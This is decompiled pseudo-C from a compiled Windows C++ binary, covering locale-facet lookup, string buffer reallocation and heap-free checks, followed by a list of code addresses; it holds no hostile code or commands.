				_t219 =  *0x444f44; // 0x0
				_v36 = _t219;
				if(_t431 == 0) {
					__ecx =  &_v32;
					__eax = E0041247D( &_v32, __edi);
					__eflags =  *0x444fc8 - __edi; // 0x0
					if(__eflags == 0) {
						__eax =  *0x444310; // 0x2
						__eax = __eax + 1;
						__eflags = __eax;
						 *0x444310 = __eax;
						 *0x444fc8 = __eax;
					}
					__ecx =  &_v32;
					__eax = E004124D5(__ecx);
					__edi =  *0x444fc8; // 0x0
				}
				_t25 =  &(_t362[1]); // 0x0
				_t376 =  *_t25;
				_t363 = _t431 * 4;
				__eflags = _t431 -  *((intOrPtr*)(_t376 + 0xc));
				if(_t431 >=  *((intOrPtr*)(_t376 + 0xc))) {
					_t449 = 0;
					__eflags = 0;
					goto L17;
				} else {
					_t449 =  *(_t363 +  *((intOrPtr*)(_t376 + 8)));
					__eflags = _t449;
					if(_t449 == 0) {
						L17:
						__eflags =  *((char*)(_t376 + 0x14));
						if( *((char*)(_t376 + 0x14)) == 0) {
							L20:
							__eflags = _t449;
							if(_t449 != 0) {
								goto L15;
							} else {
								goto L21;
							}
						} else {
							_t358 = E0041265A();
							__eflags = _t431 -  *((intOrPtr*)(_t358 + 0xc));
							if(_t431 >=  *((intOrPtr*)(_t358 + 0xc))) {
								L21:
								_t223 = _v36;
								__eflags = _t223;
								if(__eflags == 0) {
									_t449 = E0041362C(_t363, _t431, _t449, __eflags, 8);
									_t501 = _t499 + 4;
									_v36 = _t449;
									_t40 = _v24 + 4; // 0xd88b04c4
									_t226 =  *_t40;
									__eflags = _t226;
									if(_t226 == 0) {
										_t433 = 0x43e90c;
									} else {
										_t433 =  *(_t226 + 0x18);
										__eflags = _t433;
										if(_t433 == 0) {
											_t42 = _t226 + 0x1c; // 0xd88b04e0
											_t433 = _t42;
										}
									}
									E0041247D( &_v88, 0);
									_v84 = 0;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									_v56 = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									_v40 = 0;
									_v8 = 8;
									__eflags = _t433;
									if(_t433 == 0) {
										E00412430("bad locale name");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t482);
										_t484 = _t501;
										_push(0xffffffff);
										_push(0x431c55);
										_push( *[fs:0x0]);
										_t502 = _t501 - 0x14;
										_t231 =  *0x443048; // 0x35200185
										_t232 = _t231 ^ _t484;
										_v124 = _t232;
										_push(_t363);
										_push(_t449);
										_push(_t433);
										_push(_t232);
										 *[fs:0x0] =  &_v120;
										_t451 = _v100;
										_v132 = _t451;
										E0041247D( &_v136, 0);
										_v112 = 0;
										_t434 =  *0x444fd0; // 0x0
										_t365 =  *0x444f40; // 0x0
										_v140 = _t365;
										__eflags = _t434;
										if(_t434 == 0) {
											E0041247D( &_v28, _t434);
											__eflags =  *0x444fd0 - _t434; // 0x0
											if(__eflags == 0) {
												_t336 =  *0x444310; // 0x2
												_t337 = _t336 + 1;
												__eflags = _t337;
												 *0x444310 = _t337;
												 *0x444fd0 = _t337;
											}
											E004124D5( &_v28);
											_t434 =  *0x444fd0; // 0x0
										}
										_t418 =  *(_t451 + 4);
										_t384 = _t434 * 4;
										_v28 = _t384;
										__eflags = _t434 -  *((intOrPtr*)(_t418 + 0xc));
										if(_t434 >=  *((intOrPtr*)(_t418 + 0xc))) {
											_t452 = 0;
											__eflags = 0;
											_v28 = _t384;
											goto L50;
										} else {
											_t452 =  *(_t384 +  *((intOrPtr*)(_t418 + 8)));
											__eflags = _t452;
											if(_t452 != 0) {
												L58:
												E004124D5( &_v36);
												 *[fs:0x0] = _v20;
												_pop(_t435);
												_pop(_t453);
												_pop(_t366);
												__eflags = _v24 ^ _t484;
												return E0041361E(_t452, _t366, _v24 ^ _t484, _t418, _t435, _t453);
											} else {
												L50:
												__eflags =  *((char*)(_t418 + 0x14));
												if( *((char*)(_t418 + 0x14)) == 0) {
													L53:
													__eflags = _t452;
													if(_t452 != 0) {
														goto L58;
													} else {
														goto L54;
													}
												} else {
													_t331 = E0041265A();
													__eflags = _t434 -  *((intOrPtr*)(_t331 + 0xc));
													if(_t434 >=  *((intOrPtr*)(_t331 + 0xc))) {
														L54:
														__eflags = _t365;
														if(_t365 == 0) {
															_t239 = E00408E80(_t365, _t434, _t452,  &_v40, _v32);
															_t504 = _t502 + 8;
															__eflags = _t239 - 0xffffffff;
															if(__eflags == 0) {
																_t240 = E00403390();
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t484);
																_t486 = _t504;
																_push(_t452);
																_push(_t434);
																_t431 = _t418;
																_t454 = _t384;
																__eflags = _t454 - _t431;
																if(_t454 == _t431) {
																	L68:
																	return _t240;
																} else {
																	do {
																		_t390 =  *((intOrPtr*)(_t454 + 0x14));
																		__eflags = _t390 - 0x10;
																		if(_t390 < 0x10) {
																			goto L67;
																		} else {
																			_t241 =  *_t454;
																			_t391 = _t390 + 1;
																			__eflags = _t391 - 0x1000;
																			if(_t391 < 0x1000) {
																				L66:
																				_push(_t391);
																				_t240 = E004138AD(_t241);
																				_t504 = _t504 + 8;
																				goto L67;
																			} else {
																				_t419 =  *((intOrPtr*)(_t241 - 4));
																				_t391 =  &(_t391[8]);
																				__eflags = _t241 - _t419 + 0xfffffffc - 0x1f;
																				if(_t241 - _t419 + 0xfffffffc > 0x1f) {
																					E0041805F(_t365, _t391, _t419);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t486);
																					_t488 = _t504;
																					_t505 = _t504 - 0xc;
																					_push(_t365);
																					_t367 = _t391;
																					_t392 = 0x7fffffff;
																					_push(_t454);
																					_t456 = _v160;
																					_t420 = _t367[4];
																					_v172 = _t420;
																					_push(_t431);
																					__eflags = 0x7fffffff - _t420 - _t456;
																					if(0x7fffffff - _t420 < _t456) {
																						E00401BD0(_t367, 0x7fffffff, _t420);
																						goto L91;
																					} else {
																						_t431 = _t367[5];
																						_t313 = _t420 + _t456;
																						_v28 = _t313;
																						_t476 = _t313 | 0x0000000f;
																						_v24 = _t431;
																						__eflags = _t476 - 0x7fffffff;
																						if(_t476 <= 0x7fffffff) {
																							_t315 = _t431 >> 1;
																							_t392 = 0x7fffffff - _t315;
																							__eflags = _t431 - _t392;
																							if(_t431 <= _t392) {
																								_t316 = _t315 + _t431;
																								__eflags = _t476 - _t316;
																								_t456 =  <  ? _t316 : _t476;
																								_t121 = _t456 + 1; // 0x80000000
																								_t392 = _t121;
																								__eflags = _t392 - 0x1000;
																								if(_t392 < 0x1000) {
																									__eflags = _t392;
																									if(__eflags == 0) {
																										_t431 = 0;
																										__eflags = 0;
																									} else {
																										_t325 = E0041362C(_t367, _t431, _t456, __eflags, _t392);
																										_t420 = _v20;
																										_t505 = _t505 + 4;
																										_t431 = _t325;
																									}
																									goto L84;
																								} else {
																									_t122 = _t392 + 0x23; // 0x80000023
																									_t326 = _t122;
																									__eflags = _t122 - _t392;
																									if(__eflags <= 0) {
																										L91:
																										E00401B30();
																										goto L92;
																									} else {
																										goto L74;
																									}
																								}
																							} else {
																								_t456 = 0x7fffffff;
																								goto L73;
																							}
																						} else {
																							_t456 = 0x7fffffff;
																							L73:
																							_t326 = 0xffffffff80000023;
																							__eflags = 0x80000000;
																							L74:
																							_t327 = E0041362C(_t367, _t431, _t456, __eflags, _t326);
																							_t505 = _t505 + 4;
																							__eflags = _t327;
																							if(_t327 == 0) {
																								L92:
																								E0041805F(_t367, _t392, _t420);
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								_push(_t488);
																								_t489 = _t505;
																								_t506 = _t505 - 0x14;
																								_push(_t367);
																								_t368 = _t392;
																								_t393 = 0x7fffffff;
																								_push(_t456);
																								_t457 = _v184;
																								_t421 = _t368[4];
																								_v196 = _t421;
																								_push(_t431);
																								__eflags = 0x7fffffff - _t421 - _t457;
																								if(0x7fffffff - _t421 < _t457) {
																									E00401BD0(_t368, 0x7fffffff, _t421);
																									goto L114;
																								} else {
																									_t431 = _t368[5];
																									_t290 = _t421 + _t457;
																									_v28 = _t290;
																									_t470 = _t290 | 0x0000000f;
																									_v32 = _t431;
																									__eflags = _t470 - 0x7fffffff;
																									if(_t470 <= 0x7fffffff) {
																										_t292 = _t431 >> 1;
																										_t393 = 0x7fffffff - _t292;
																										__eflags = _t431 - _t393;
																										if(_t431 <= _t393) {
																											_t293 = _t292 + _t431;
																											__eflags = _t470 - _t293;
																											_t457 =  <  ? _t293 : _t470;
																											_t151 = _t457 + 1; // 0x80000000
																											_t393 = _t151;
																											__eflags = _t393 - 0x1000;
																											if(_t393 < 0x1000) {
																												__eflags = _t393;
																												if(__eflags == 0) {
																													_t431 = 0;
																													__eflags = 0;
																												} else {
																													_t309 = E0041362C(_t368, _t431, _t457, __eflags, _t393);
																													_t421 = _v24;
																													_t506 = _t506 + 4;
																													_t431 = _t309;
																												}
																												goto L107;
																											} else {
																												_t152 = _t393 + 0x23; // 0x80000023
																												_t310 = _t152;
																												__eflags = _t152 - _t393;
																												if(__eflags <= 0) {
																													L114:
																													E00401B30();
																													goto L115;
																												} else {
																													goto L97;
																												}
																											}
																										} else {
																											_t457 = 0x7fffffff;
																											goto L96;
																										}
																									} else {
																										_t457 = 0x7fffffff;
																										L96:
																										_t310 = 0xffffffff80000023;
																										__eflags = 0x80000000;
																										L97:
																										_t311 = E0041362C(_t368, _t431, _t457, __eflags, _t310);
																										_t506 = _t506 + 4;
																										__eflags = _t311;
																										if(_t311 == 0) {
																											L115:
																											E0041805F(_t368, _t393, _t421);
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											asm("int3");
																											_push(_t489);
																											_t482 = _t506;
																											_t499 = _t506 - 0x10;
																											_push(_t368);
																											_t362 = _t393;
																											_t394 = 0x7fffffff;
																											_push(_t457);
																											_t448 = _v216;
																											_t422 = _t362[4];
																											_v228 = _t422;
																											_push(_t431);
																											__eflags = 0x7fffffff - _t422 - _t448;
																											if(0x7fffffff - _t422 < _t448) {
																												E00401BD0(_t362, 0x7fffffff, _t422);
																												goto L137;
																											} else {
																												_t431 = _t362[5];
																												_t268 = _t422 + _t448;
																												_v32 = _t268;
																												_t464 = _t268 | 0x0000000f;
																												_v36 = _t431;
																												__eflags = _t464 - 0x7fffffff;
																												if(_t464 <= 0x7fffffff) {
																													_t270 = _t431 >> 1;
																													_t394 = 0x7fffffff - _t270;
																													__eflags = _t431 - _t394;
																													if(_t431 <= _t394) {
																														_t271 = _t270 + _t431;
																														__eflags = _t464 - _t271;
																														_t448 =  <  ? _t271 : _t464;
																														_t191 = _t448 + 1; // 0x80000000
																														_t394 = _t191;
																														__eflags = _t394 - 0x1000;
																														if(_t394 < 0x1000) {
																															__eflags = _t394;
																															if(__eflags == 0) {
																																_t431 = 0;
																																__eflags = 0;
																															} else {
																																_t286 = E0041362C(_t362, _t431, _t448, __eflags, _t394);
																																_t422 = _v28;
																																_t499 = _t499 + 4;
																																_t431 = _t286;
																															}
																															goto L130;
																														} else {
																															_t192 = _t394 + 0x23; // 0x80000023
																															_t287 = _t192;
																															__eflags = _t192 - _t394;
																															if(__eflags <= 0) {
																																L137:
																																E00401B30();
																																goto L138;
																															} else {
																																goto L120;
																															}
																														}
																													} else {
																														_t448 = 0x7fffffff;
																														goto L119;
																													}
																												} else {
																													_t448 = 0x7fffffff;
																													L119:
																													_t287 = 0xffffffff80000023;
																													__eflags = 0x80000000;
																													L120:
																													_t288 = E0041362C(_t362, _t431, _t448, __eflags, _t287);
																													_t499 = _t499 + 4;
																													__eflags = _t288;
																													if(_t288 == 0) {
																														L138:
																														_t219 = E0041805F(_t362, _t394, _t422);
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														asm("int3");
																														_t375 =  *_t394;
																														__eflags = _t375;
																														if(_t375 != 0) {
																															_push(_t431);
																															_t437 = _t375;
																															_t395 =  *_t437;
																															if(_t395 == 0) {
																																L6:
																																return _t219;
																															} else {
																																_push(_t448);
																																_push(_t395);
																																L60();
																																_t458 =  *_t437;
																																_t399 = (0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2) + ((0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *(_t437 + 8) - _t458) >> 0x20 >> 2)) * 2 << 3;
																																if(_t399 < 0x1000) {
																																	L5:
																																	_push(_t399);
																																	_t219 = E004138AD(_t458);
																																	 *_t437 = 0;
																																	 *(_t437 + 4) = 0;
																																	 *(_t437 + 8) = 0;
																																	goto L6;
																																} else {
																																	_t426 =  *((intOrPtr*)(_t458 - 4));
																																	_t399 = _t399 + 0x23;
																																	_t460 = _t458 - _t426;
																																	if(_t460 - 4 > 0x1f) {
																																		E0041805F(_t362, _t399, _t426);
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		asm("int3");
																																		_push(_t482);
																																		__eflags = _v252 & 0x00000001;
																																		_push(_t460);
																																		_t461 = _t399;
																																		 *_t461 = 0x4337e4;
																																		if((_v252 & 0x00000001) != 0) {
																																			_push(8);
																																			E004138AD(_t461);
																																		}
																																		return _t461;
																																	} else {
																																		_t458 = _t426;
																																		goto L5;
																																	}
																																}
																															}
																														} else {
																															return _t219;
																														}
																													} else {
																														_t422 = _v28;
																														_t189 = _t288 + 0x23; // 0x23
																														_t431 = _t189 & 0xffffffe0;
																														 *(_t431 - 4) = _t288;
																														L130:
																														_t362[4] = _v32;
																														_v28 = _v4;
																														_t362[5] = _t448;
																														_t465 = _t431 + _t422;
																														_v40 = _t465;
																														__eflags = _v36 - 0x10;
																														_v32 = _v8 + _t465;
																														_push(_t422);
																														if(_v36 < 0x10) {
																															_push(_t362);
																															_push(_t431);
																															E00414BF0();
																															E00415180(_t431, _t465, _v28, _v8);
																															 *_v32 = 0;
																															 *_t362 = _t431;
																															return _t362;
																														} else {
																															_t467 =  *_t362;
																															_push(_t467);
																															_push(_t431);
																															E00414BF0();
																															E00415180(_t431, _v40, _v28, _v8);
																															_t499 = _t499 + 0x18;
																															_t401 = _v36 + 1;
																															 *_v32 = 0;
																															__eflags = _t401 - 0x1000;
																															if(_t401 < 0x1000) {
																																L134:
																																_push(_t401);
																																E004138AD(_t467);
																																 *_t362 = _t431;
																																return _t362;
																															} else {
																																_t422 =  *(_t467 - 4);
																																_t394 = _t401 + 0x23;
																																_t448 = _t467 - _t422;
																																_t210 = _t448 - 4; // 0x7ffffffb
																																__eflags = _t210 - 0x1f;
																																if(_t210 > 0x1f) {
																																	goto L138;
																																} else {
																																	_t467 = _t422;
																																	goto L134;
																																}
																															}
																														}
																													}
																												}
																											}
																										} else {
																											_t421 = _v24;
																											_t149 = _t311 + 0x23; // 0x23
																											_t431 = _t149 & 0xffffffe0;
																											 *(_t431 - 4) = _t311;
																											L107:
																											_t368[4] = _v28;
																											_v24 = _a4;
																											_t296 = _v4;
																											_t368[5] = _t457;
																											_push(_t296);
																											_v36 = _t421 - _t296 + 1;
																											_t471 = _t431 + _t296;
																											_v40 = _t471;
																											__eflags = _v32 - 0x10;
																											_v28 = _v0 + _t471;
																											if(_v32 < 0x10) {
																												_push(_t368);
																												_push(_t431);
																												E00414BF0();
																												E00415180(_t431, _t471, _v24, _v0);
																												__eflags = _v4 + _t368;
																												E00414BF0(_v28, _v4 + _t368, _v36);
																												 *_t368 = _t431;
																												return _t368;
																											} else {
																												_t473 =  *_t368;
																												_push(_t473);
																												_push(_t431);
																												E00414BF0();
																												E00415180(_t431, _v40, _v24, _v0);
																												E00414BF0(_v28, _v4 + _t473, _v36);
																												_t506 = _t506 + 0x24;
																												_t408 = _v32 + 1;
																												__eflags = _t408 - 0x1000;
																												if(_t408 < 0x1000) {
																													L111:
																													_push(_t408);
																													E004138AD(_t473);
																													 *_t368 = _t431;
																													return _t368;
																												} else {
																													_t421 =  *(_t473 - 4);
																													_t393 = _t408 + 0x23;
																													_t457 = _t473 - _t421;
																													_t175 = _t457 - 4; // 0x7ffffffb
																													__eflags = _t175 - 0x1f;
																													if(_t175 > 0x1f) {
																														goto L115;
																													} else {
																														_t473 = _t421;
																														goto L111;
																													}
																												}
																											}
																										}
																									}
																								}
																							} else {
																								_t420 = _v20;
																								_t119 = _t327 + 0x23; // 0x23
																								_t431 = _t119 & 0xffffffe0;
																								 *(_t431 - 4) = _t327;
																								L84:
																								__eflags = _v24 - 0x10;
																								_t367[4] = _v28;
																								_t367[5] = _t456;
																								_push(_t420);
																								if(_v24 < 0x10) {
																									_push(_t367);
																									_push(_t431);
																									E00414BF0();
																									_t428 = _v20;
																									 *((char*)(_t431 + _t428)) = _v0;
																									 *((char*)(_t431 + _t428 + 1)) = 0;
																									 *_t367 = _t431;
																									return _t367;
																								} else {
																									_t478 =  *_t367;
																									_push(_t478);
																									_push(_t431);
																									E00414BF0();
																									_t429 = _v20;
																									_t505 = _t505 + 0xc;
																									_t411 = _v24 + 1;
																									 *((char*)(_t431 + _t429)) = _v0;
																									 *((char*)(_t431 + _t429 + 1)) = 0;
																									__eflags = _t411 - 0x1000;
																									if(_t411 < 0x1000) {
																										L88:
																										_push(_t411);
																										E004138AD(_t478);
																										 *_t367 = _t431;
																										return _t367;
																									} else {
																										_t420 =  *(_t478 - 4);
																										_t392 = _t411 + 0x23;
																										_t456 = _t478 - _t420;
																										_t135 = _t456 - 4; // 0x7ffffffb
																										__eflags = _t135 - 0x1f;
																										if(_t135 > 0x1f) {
																											goto L92;
																										} else {
																											_t478 = _t420;
																											goto L88;
																										}
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t241 = _t419;
																					goto L66;
																				}
																			}
																		}
																		goto L141;
																		L67:
																		 *(_t454 + 0x10) = 0;
																		 *((intOrPtr*)(_t454 + 0x14)) = 0xf;
																		 *_t454 = 0;
																		_t454 = _t454 + 0x18;
																		__eflags = _t454 - _t431;
																	} while (_t454 != _t431);
																	goto L68;
																}
															} else {
																_t452 = _v40;
																_v32 = _t452;
																_v12 = 1;
																E0041262E(__eflags, _t452);
																_t418 =  *_t452;
																 *((intOrPtr*)( *_t452 + 4))();
																 *0x444f40 = _t452;
																goto L58;
															}
														} else {
															_t452 = _t365;
															goto L58;
														}
													} else {
														_t452 =  *(_v28 +  *((intOrPtr*)(_t331 + 8)));
														goto L53;
													}
												}
											}
										}
									} else {
										E00412760( &_v88,  &_v88, _t433);
										 *(_t449 + 4) = 0;
										 *_t449 = 0x434418;
										_v8 = 9;
										E004127AB( &_v88,  &_v88);
										_t342 = _v44;
										_t523 = _t501 + 0xc;
										__eflags = _t342;
										if(_t342 != 0) {
											E0041AC1E(_t342);
											_t523 = _t523 + 4;
										}
										_t343 = _v52;
										_v44 = 0;
										__eflags = _t343;
										if(_t343 != 0) {
											E0041AC1E(_t343);
											_t523 = _t523 + 4;
										}
										_t344 = _v60;
										_v52 = 0;
										__eflags = _t344;
										if(_t344 != 0) {
											E0041AC1E(_t344);
											_t523 = _t523 + 4;
										}
										_t345 = _v68;
										_v60 = 0;
										__eflags = _t345;
										if(_t345 != 0) {
											E0041AC1E(_t345);
											_t523 = _t523 + 4;
										}
										_t346 = _v76;
										_v68 = 0;
										__eflags = _t346;
										if(_t346 != 0) {
											E0041AC1E(_t346);
											_t523 = _t523 + 4;
										}
										_t347 = _v84;
										_v76 = 0;
										__eflags = _t347;
										if(_t347 != 0) {
											E0041AC1E(_t347);
											_t523 = _t523 + 4;
										}
										_v84 = 0;
										E004124D5( &_v88);
										_v24 = _t449;
										_v8 = 0xa;
										E0041262E(__eflags, _t449);
										 *((intOrPtr*)( *_t449 + 4))();
										 *0x444f44 = _t449;
										goto L15;
									}
								} else {
									_t449 = _t223;
									goto L15;
								}
							} else {
								_t449 =  *(_t363 +  *((intOrPtr*)(_t358 + 8)));
								goto L20;
							}
						}
					} else {
						L15:
						E004124D5( &_v28);
						 *[fs:0x0] = _v16;
						_pop(_t432);
						_pop(_t450);
						_pop(_t364);
						__eflags = _v20 ^ _t482;
						return E0041361E(_t449, _t364, _v20 ^ _t482, _t417, _t432, _t450);
					}
				}
				L141:
			}

0x00408650
0x00408650
0x00408651
0x00408653
0x00408655
0x00408660
0x00408661
0x00408664
0x00408669
0x0040866b
0x0040866e
0x0040866f
0x00408670
0x00408671
0x00408675
0x0040867b
0x0040867e
0x00408683
0x00408686
0x0040868b
0x00408692
0x00408698
0x0040869d
0x004086a2
0x004086a5
0x004086a8
0x004086ad
0x004086b3
0x004086b5
0x004086ba
0x004086ba
0x004086bb
0x004086c0
0x004086c0
0x004086c5
0x004086c8
0x004086cd
0x004086cd
0x004086d3
0x004086d3
0x004086d6
0x004086dd
0x004086e0
0x00408712
0x00408712
0x00000000
0x004086e2
0x004086e5
0x004086e8
0x004086ea
0x00408714
0x00408714
0x00408718
0x0040872a
0x0040872a
0x0040872c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040871a
0x0040871a
0x0040871f
0x00408722
0x0040872e
0x0040872e
0x00408731
0x00408733
0x00408740
0x00408742
0x00408745
0x0040874b
0x0040874b
0x0040874e
0x00408750
0x0040875e
0x00408752
0x00408752
0x00408755
0x00408757
0x00408759
0x00408759
0x00408759
0x00408757
0x00408768
0x0040876d
0x00408774
0x00408778
0x0040877f
0x00408785
0x0040878c
0x00408790
0x00408793
0x00408797
0x0040879a
0x0040879d
0x004087a0
0x004087a3
0x004087a7
0x004087a9
0x0040888f
0x00408894
0x00408895
0x00408896
0x00408897
0x00408898
0x00408899
0x0040889a
0x0040889b
0x0040889c
0x0040889d
0x0040889e
0x0040889f
0x004088a0
0x004088a1
0x004088a3
0x004088a5
0x004088b0
0x004088b1
0x004088b4
0x004088b9
0x004088bb
0x004088be
0x004088bf
0x004088c0
0x004088c1
0x004088c5
0x004088cb
0x004088d3
0x004088d6
0x004088db
0x004088e2
0x004088e8
0x004088ee
0x004088f1
0x004088f3
0x004088f9
0x004088fe
0x00408904
0x00408906
0x0040890b
0x0040890b
0x0040890c
0x00408911
0x00408911
0x00408919
0x0040891e
0x0040891e
0x00408924
0x00408927
0x0040892e
0x00408931
0x00408934
0x00408942
0x00408942
0x00408944
0x00000000
0x00408936
0x00408939
0x0040893c
0x0040893e
0x004089a0
0x004089a3
0x004089ad
0x004089b5
0x004089b6
0x004089b7
0x004089bb
0x004089c5
0x00408940
0x00408947
0x00408947
0x0040894b
0x00408960
0x00408960
0x00408962
0x00000000
0x00000000
0x00000000
0x00000000
0x0040894d
0x0040894d
0x00408952
0x00408955
0x00408964
0x00408964
0x00408966
0x00408973
0x00408978
0x0040897b
0x0040897e
0x004089c6
0x004089cb
0x004089cc
0x004089cd
0x004089ce
0x004089cf
0x004089d0
0x004089d1
0x004089d3
0x004089d4
0x004089d5
0x004089d7
0x004089d9
0x004089db
0x00408a27
0x00408a2a
0x004089e0
0x004089e0
0x004089e0
0x004089e3
0x004089e6
0x00000000
0x004089e8
0x004089e8
0x004089ea
0x004089eb
0x004089f1
0x00408a05
0x00408a05
0x00408a07
0x00408a0c
0x00000000
0x004089f3
0x004089f3
0x004089f6
0x004089fe
0x00408a01
0x00408a2b
0x00408a30
0x00408a31
0x00408a32
0x00408a33
0x00408a34
0x00408a35
0x00408a36
0x00408a37
0x00408a38
0x00408a39
0x00408a3a
0x00408a3b
0x00408a3c
0x00408a3d
0x00408a3e
0x00408a3f
0x00408a40
0x00408a41
0x00408a43
0x00408a46
0x00408a47
0x00408a49
0x00408a50
0x00408a51
0x00408a54
0x00408a59
0x00408a5c
0x00408a5d
0x00408a5f
0x00408b6d
0x00000000
0x00408a65
0x00408a65
0x00408a68
0x00408a6d
0x00408a70
0x00408a73
0x00408a76
0x00408a78
0x00408aa5
0x00408aa7
0x00408aa9
0x00408aab
0x00408ab4
0x00408ab6
0x00408ab8
0x00408abb
0x00408abb
0x00408abe
0x00408ac4
0x00408ad3
0x00408ad5
0x00408ae7
0x00408ae7
0x00408ad7
0x00408ad8
0x00408add
0x00408ae0
0x00408ae3
0x00408ae3
0x00000000
0x00408ac6
0x00408ac6
0x00408ac6
0x00408ac9
0x00408acb
0x00408b72
0x00408b72
0x00000000
0x00408ad1
0x00000000
0x00408ad1
0x00408acb
0x00408aad
0x00408aad
0x00000000
0x00408aad
0x00408a7a
0x00408a7a
0x00408a7c
0x00408a81
0x00408a81
0x00408a84
0x00408a85
0x00408a8a
0x00408a8d
0x00408a8f
0x00408b77
0x00408b77
0x00408b7c
0x00408b7d
0x00408b7e
0x00408b7f
0x00408b80
0x00408b81
0x00408b83
0x00408b86
0x00408b87
0x00408b89
0x00408b90
0x00408b91
0x00408b94
0x00408b99
0x00408b9c
0x00408b9d
0x00408b9f
0x00408ced
0x00000000
0x00408ba5
0x00408ba5
0x00408ba8
0x00408bad
0x00408bb0
0x00408bb3
0x00408bb6
0x00408bb8
0x00408be5
0x00408be7
0x00408be9
0x00408beb
0x00408bf4
0x00408bf6
0x00408bf8
0x00408bfb
0x00408bfb
0x00408bfe
0x00408c04
0x00408c13
0x00408c15
0x00408c27
0x00408c27
0x00408c17
0x00408c18
0x00408c1d
0x00408c20
0x00408c23
0x00408c23
0x00000000
0x00408c06
0x00408c06
0x00408c06
0x00408c09
0x00408c0b
0x00408cf2
0x00408cf2
0x00000000
0x00408c11
0x00000000
0x00408c11
0x00408c0b
0x00408bed
0x00408bed
0x00000000
0x00408bed
0x00408bba
0x00408bba
0x00408bbc
0x00408bc1
0x00408bc1
0x00408bc4
0x00408bc5
0x00408bca
0x00408bcd
0x00408bcf
0x00408cf7
0x00408cf7
0x00408cfc
0x00408cfd
0x00408cfe
0x00408cff
0x00408d00
0x00408d01
0x00408d03
0x00408d06
0x00408d07
0x00408d09
0x00408d10
0x00408d11
0x00408d14
0x00408d19
0x00408d1c
0x00408d1d
0x00408d1f
0x00408e4c
0x00000000
0x00408d25
0x00408d25
0x00408d28
0x00408d2d
0x00408d30
0x00408d33
0x00408d36
0x00408d38
0x00408d65
0x00408d67
0x00408d69
0x00408d6b
0x00408d74
0x00408d76
0x00408d78
0x00408d7b
0x00408d7b
0x00408d7e
0x00408d84
0x00408d93
0x00408d95
0x00408da7
0x00408da7
0x00408d97
0x00408d98
0x00408d9d
0x00408da0
0x00408da3
0x00408da3
0x00000000
0x00408d86
0x00408d86
0x00408d86
0x00408d89
0x00408d8b
0x00408e51
0x00408e51
0x00000000
0x00408d91
0x00000000
0x00408d91
0x00408d8b
0x00408d6d
0x00408d6d
0x00000000
0x00408d6d
0x00408d3a
0x00408d3a
0x00408d3c
0x00408d41
0x00408d41
0x00408d44
0x00408d45
0x00408d4a
0x00408d4d
0x00408d4f
0x00408e56
0x00408e56
0x00408e5b
0x00408e5c
0x00408e5d
0x00408e5e
0x00408e5f
0x00408e60
0x00408e62
0x00408e64
0x004071d0
0x004071d1
0x004071d3
0x004071d7
0x0040723d
0x0040723e
0x004071d9
0x004071dc
0x004071dd
0x004071de
0x004071eb
0x00407201
0x0040720a
0x0040721e
0x0040721e
0x00407220
0x00407228
0x0040722e
0x00407235
0x00000000
0x0040720c
0x0040720c
0x0040720f
0x00407212
0x0040721a
0x0040723f
0x00407244
0x00407245
0x00407246
0x00407247
0x00407248
0x00407249
0x0040724a
0x0040724b
0x0040724c
0x0040724d
0x0040724e
0x0040724f
0x00407250
0x00407253
0x00407257
0x00407258
0x0040725a
0x00407260
0x00407262
0x00407265
0x0040726a
0x00407271
0x0040721c
0x0040721c
0x00000000
0x0040721c
0x0040721a
0x0040720a
0x00408e6a
0x00408e6a
0x00408e6a
0x00408d55
0x00408d55
0x00408d58
0x00408d5b
0x00408d5e
0x00408da9
0x00408dac
0x00408db3
0x00408db9
0x00408dbc
0x00408dc1
0x00408dc4
0x00408dc8
0x00408dcb
0x00408dcc
0x00408e23
0x00408e24
0x00408e25
0x00408e31
0x00408e3c
0x00408e41
0x00408e49
0x00408dce
0x00408dce
0x00408dd0
0x00408dd1
0x00408dd2
0x00408de0
0x00408de8
0x00408dee
0x00408def
0x00408df2
0x00408df8
0x00408e0c
0x00408e0c
0x00408e0e
0x00408e16
0x00408e20
0x00408dfa
0x00408dfa
0x00408dfd
0x00408e00
0x00408e02
0x00408e05
0x00408e08
0x00000000
0x00408e0a
0x00408e0a
0x00000000
0x00408e0a
0x00408e08
0x00408df8
0x00408dcc
0x00408d4f
0x00408d38
0x00408bd5
0x00408bd5
0x00408bd8
0x00408bdb
0x00408bde
0x00408c29
0x00408c2c
0x00408c33
0x00408c36
0x00408c3b
0x00408c3e
0x00408c42
0x00408c45
0x00408c4d
0x00408c50
0x00408c54
0x00408c57
0x00408cb9
0x00408cba
0x00408cbb
0x00408cc7
0x00408cd2
0x00408cd8
0x00408ce0
0x00408cea
0x00408c59
0x00408c59
0x00408c5b
0x00408c5c
0x00408c5d
0x00408c6b
0x00408c7c
0x00408c84
0x00408c87
0x00408c88
0x00408c8e
0x00408ca2
0x00408ca2
0x00408ca4
0x00408cac
0x00408cb6
0x00408c90
0x00408c90
0x00408c93
0x00408c96
0x00408c98
0x00408c9b
0x00408c9e
0x00000000
0x00408ca0
0x00408ca0
0x00000000
0x00408ca0
